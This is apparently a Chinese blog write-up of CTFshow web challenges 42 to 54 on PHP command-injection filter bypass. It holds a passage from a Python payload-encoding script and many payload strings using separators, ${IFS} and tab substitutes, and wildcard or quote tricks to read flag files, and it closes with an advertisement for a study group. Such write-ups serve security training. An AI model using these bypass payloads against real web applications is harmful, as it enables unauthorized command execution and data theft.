def action(arg):
s1 = “”
s2 = “”
for i in arg:
f = open(r"F:\desktop\Learning\CTFtools\Web\phpstudy_pro\phpstudy_pro\WWW\rce.txt", “r”) # 填txt的文件位置
while True:
t = f.readline()
if t == “”:
break
if t[0] == i:
# print(i)
s1 += t[2:5]
s2 += t[6:9]
break
f.close()
output = “(”" + s1 + “”|“” + s2 + “”)"
return (output)
while True:
param = action(input(“\n[+] your function:”)) + action(input(“[+] your command:”))
data = {
‘c’: urllib.parse.unquote(param)
}
r = requests.post(url, data=data)
print(“\n[*] result:\n” + r.text)
命令行的使用:
python rce.py [url]
![image-20230413200051409](https://img-blog.csdnimg.cn/img_convert/6547da89a0dd2881f39130be49b0bbc5.png)
### web42(>/dev/null 2>&1)
![image-20230414143622053](https://img-blog.csdnimg.cn/img_convert/acfbe6c4020e4a5d3c80662789435c7b.png)
终于没有preg\_match函数来过滤了,这回里面都是认识的,只不过后面GET传参的c还连接了一个
“>/dev/null 2>&1”
对于这个语句:
/dev/null:
说明一下 /dev/null 说白了就是写入这个里面的内容都会丢失,读取这里面的内容什么也不会读取到
而前面的 > 表示重定向代表的是要去哪里
因为 > 前面没有数值,所以默认的是1,表示标准输出重定向到 /dev/null (空设备文件)
因此不会显示任何的数据,同时也不会读取到任何的数据
2>&1:
这里的1表示stdout标准输出,系统默认值是1,因此 > 前面没有值的时候就是默认标准输出 1>
这里的2表示stderr标准错误
&表示等同于的意思
在这里这个语句的意思就表示2的输出重定向等同于1,即标准错误输出重定向等同于标准输出
因为之前标准输出已经重定向到空设备文件,左移标准错误输出也重定向到空设备文件
这整一句话的意思是:让所有输出流(不管你是对的还是错的)都重定向到空设备文件中丢弃掉
所以关键就是不能让后面这个重定向执行下去就行
构造payload:
c=cat flag.php; // 用 ; 把命令隔断
c=cat flag.php|| // ||表示只执行||前面的语句
c=cat flag.php%0a // %0a是url编码,表示的是换行
c=cat flag.php%26 // %26是url编码,表示的是&符
另外说明一下:
| 表示只执行后面的命令
|| 表示只执行前面的命令
&和&& 表示两条命令都会执行
此外,php版本小于5的时候因为php的底层是C,所以截断有另外的%00可以使用
![image-20230414150643829](https://img-blog.csdnimg.cn/img_convert/196628b1d063f926f3890cb20b505949.png)
### —web43~web52过滤+>/dev/null 2>&1—
### web43(过滤分号、cat)
![image-20230414152050509](https://img-blog.csdnimg.cn/img_convert/0198943384f9ed58913a0f1cbfc9d7a5.png)
这个题其实就是在上一题的基础上多加了个过滤
过滤了
;、cat
说到底,这么多能有回显的函数,也不差cat这一个,形式有这么多,也不差分号这一个
构造payload:
c=nl flag.php%0a
c=more flag.php%0a
c=sort flag.php%0a
c=less flag.php%0a
c=tac flag.php%0a
c=tail flag.php%0a
c=strings flag.php%0a
||也能用
![image-20230414152437329](https://img-blog.csdnimg.cn/img_convert/af21fe3d06a0b1155801ed28f9249922.png)
### web44(过滤flag)
![image-20230414152735431](https://img-blog.csdnimg.cn/img_convert/9f22d446e211f88a47333d63f8fc07b7.png)
过滤了:
;、cat、flag
区区不能使用flag而已,也有构造的形式
构造payload:
c=nl fla*%0a
c=more fla*%0a
c=sort fla*%0a
c=less fla*%0a
c=tac fla*%0a
c=tail fla*%0a
c=strings fla*%0a
||也能用
![image-20230414152954507](https://img-blog.csdnimg.cn/img_convert/cbc5175f5d6b26c0c3b2190516589070.png)
### web45(过滤空格)
![image-20230414153101896](https://img-blog.csdnimg.cn/img_convert/d6fe0bb46241f6ef0a1b73db06ce9b7e.png)
过滤了:
;、cat、flag、[空格]
空格不能用可以使用tab键代替,url编码是%09,反正tab是最多是4个空格,多几个空格也不会怎样
空格绕过:
%09
${IFS}
${IFS}$9
<
构造payload:
?c=nl%09fl*%0a
?c=nl<fla\g.php%0a
?c=echo
I
F
S
‘
n
l
{IFS}`nl
IFS‘nl{IFS}fl*`%0a // 反引号表示无回显的命令执行,常配合echo来打印输出
![image-20230414153417153](https://img-blog.csdnimg.cn/img_convert/04d5d9d64a16d997334aada71e5b08bc.png)
### web46(过滤$、\*、数字)
![image-20230414161732696](https://img-blog.csdnimg.cn/img_convert/31195064417d890e9998c1f1d18d1202.png)
过滤了:
;、cat、flag、[空格]、[0-9]、$、*
构造payload:
?c=nl%09???.???%0a
?c=nl%09fla\g.php%0a
?c=nl%09fla’'g.php%0a
![image-20230414162336525](https://img-blog.csdnimg.cn/img_convert/8be4a3ec8e7aef9a8b1b93355d03c00c.png)
### web47(过滤more、less、head、sort、tail)
![image-20230414165009877](https://img-blog.csdnimg.cn/img_convert/c7bb0164e35462064c9986880f688bb1.png)
过滤了:
;、cat、flag、[空格]、[0-9]、$、*、more、less、head、sort、tail
构造payload:
?c=nl%09???.???%0a
?c=nl%09fla\g.php%0a
?c=nl%09fla’'g.php%0a
?c=nl<fla*%0a
?c=nl<fla\g.php%0a
![image-20230414165413283](https://img-blog.csdnimg.cn/img_convert/ba1256582de2f9b61a3756053c6389e3.png)
### web48(过滤sed、cut、awk、strings、od、curl、[反引号])
![image-20230414165905048](https://img-blog.csdnimg.cn/img_convert/4e3ee971e84dd74f128b30169a5174d5.png)
过滤了:
;、cat、flag、[空格]、[0-9]、$、*、more、less、head、sort、tail、sed、cut、awk、strings、od、curl、[反引号]
构造payload:
还是一样
?c=nl%09???.???%0a
?c=nl%09fla\g.php%0a
?c=nl%09fla’'g.php%0a
?c=nl<fla\g.php%0a
![image-20230414170312783](https://img-blog.csdnimg.cn/img_convert/4883e94959c3737e5e55c086ebde16fd.png)
### web49(过滤%)
![image-20230414170351596](https://img-blog.csdnimg.cn/img_convert/549bb633966598c777e2e75143e34569.png)
过滤了:
;、cat、flag、[空格]、[0-9]、$、*、more、less、head、sort、tail、sed、cut、awk、strings、od、curl、[反引号]、%
构造payload:
%被过滤掉了,能用的就少很多了,但还是有
?c=nl<fla’'g.php||
?c=nl<fla\g.php||
![image-20230414185453080](https://img-blog.csdnimg.cn/img_convert/86d6657d7ac77aa367271629bf29fa99.png)
### web50(过滤\x09、\x26)
![image-20230414185606716](https://img-blog.csdnimg.cn/img_convert/f3ddae3ff49faabb463d72784dd94f7b.png)
过滤了:
;、cat、flag、[空格]、[0-9]、$、*、more、less、head、sort、tail、sed、cut、awk、strings、od、curl、[反引号]、%、\x09、\x26
\x09与\x26的含义其实就是%09(tab键)和%26(&)
构造payload:
?c=nl<fla’'g.php||
?c=nl<fla\g.php||
![image-20230414190207794](https://img-blog.csdnimg.cn/img_convert/70fa339a43b5de5c927a1c2f0e330d84.png)
### web51(过滤tac)
![image-20230414190524086](https://img-blog.csdnimg.cn/img_convert/263f9b79a5d31fac03981422f35eb0ec.png)
过滤了:
;、cat、flag、[空格]、[0-9]、$、*、more、less、head、sort、tail、sed、cut、tac、awk、strings、od、curl、[反引号]、%、\x09、\x26
多过滤了一个tac(我寻思着我也不怎么用啊)
构造payload:
?c=nl<fla’'g.php||
?c=nl<fla\g.php||
![image-20230414190729310](https://img-blog.csdnimg.cn/img_convert/d0cfe5c86be0c7455349930fde1922be.png)
### web52(过滤>、<)
![image-20230414191003142](https://img-blog.csdnimg.cn/img_convert/0b693660187647ad36a5aabdae2658fb.png)
过滤了:
;、cat、flag、[空格]、[0-9]、*、more、less、head、sort、tail、sed、cut、tac、awk、strings、od、curl、[反引号]、%、\x09、\x26、>、<
这回终于把>和<过滤掉了,但
又给开了,
又给开了,
又给开了,想到的第一个就是${IFS}的空格替换
构造payload:
?c=nl${IFS}fla’'g.php||
![image-20230414191702807](https://img-blog.csdnimg.cn/img_convert/cb476199bbb10092067eebc178285b1a.png)
找到了,但没完全找到,去根目录看看有没有东西
?c=ls${IFS}/||
![image-20230414192220112](https://img-blog.csdnimg.cn/img_convert/e7fc2373a8b332e43453ba8092c35d3a.png)
发现有个flag,cat和ls试了一下,都没有回显,看来是个文件,直接nl
?c=nl${IFS}/fla’'g|| // 注意这个/表示根目录下的flag,不加/就会是本目录下的
![image-20230414193225885](https://img-blog.csdnimg.cn/img_convert/585765330be37cb4f1bddcd238768aaf.png)
### web53(过滤+简单代码审计)
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-6ZaP4O5W-1681564193907)(C:/Users/%E7%8B%AC%E8%B4%A4/AppData/Roaming/Typora/typora-user-images/image-20230414193615256.png)]
过滤了:
;、cat、flag、[空格]、[0-9]、*、more、wget、less、head、sort、tail、sed、cut、tac、awk、strings、od、curl、`、%、\x09、\x26、>、<
简单分析一下,if中的语句第一个是输出GET传入的参数、第二个是执行c的语句后得到的东西赋值给d、第三个是换行后在输出d的内容。if判断错误的话会输出no
构造payload:
先在目录看一眼
?c=ls${IFS}
![image-20230414194912462](https://img-blog.csdnimg.cn/img_convert/d0572c0b58cc94e31112ee5b4ef3d73b.png)
直接进flag.php
?c=nl${IFS}fla’'g.php
![image-20230414195130724](https://img-blog.csdnimg.cn/img_convert/e0a27a366a6269870991cf26f6287e01.png)
### web54(grep查找/文件重命名)
![image-20230415185352671](https://img-blog.csdnimg.cn/img_convert/bb72790efcfaacb3bff4270abf83b416.png)
过滤了一堆
; .*c.*a.t. .*f.*l.a.g. [空格] [0-9]、
.*m.*o.*r.e. .*w.*g.*e.t. .*l.*e.*s.s.
.*h.*e.*a.d. .*s.*o.*r.t. .*t.*a.*i.l.
.*s.*e.d. .*c.*u.t. .*t.*a.c. .*a.*w.k.
.*s.*t.*r.*i.*n.*g.s. .*o.d. .*c.*u.*r.l.
.*n.l. .*s.*c.p. .*r.m. ` %
\x09 x26 > <
这回是真正意义上的禁用了这些命令了,以前还能通过中间添加一些特殊符号来绕过的,现在是完全不能使用了,毕竟 . 后面跟上一个通配符后,就完全不能在中间加点什么了
像这种可以选择使用之前讲过的一种用?通配符来构造的方式,如:
对flag.php的构造可以这样:fl??.???
甚至可以简化为:???
同样,命令也可以进行构造
cat可以构造为?at、c??
**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**
**[需要这份系统化资料的朋友,可以点击这里获取](https://bbs.csdn.net/topics/618540462)**
**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**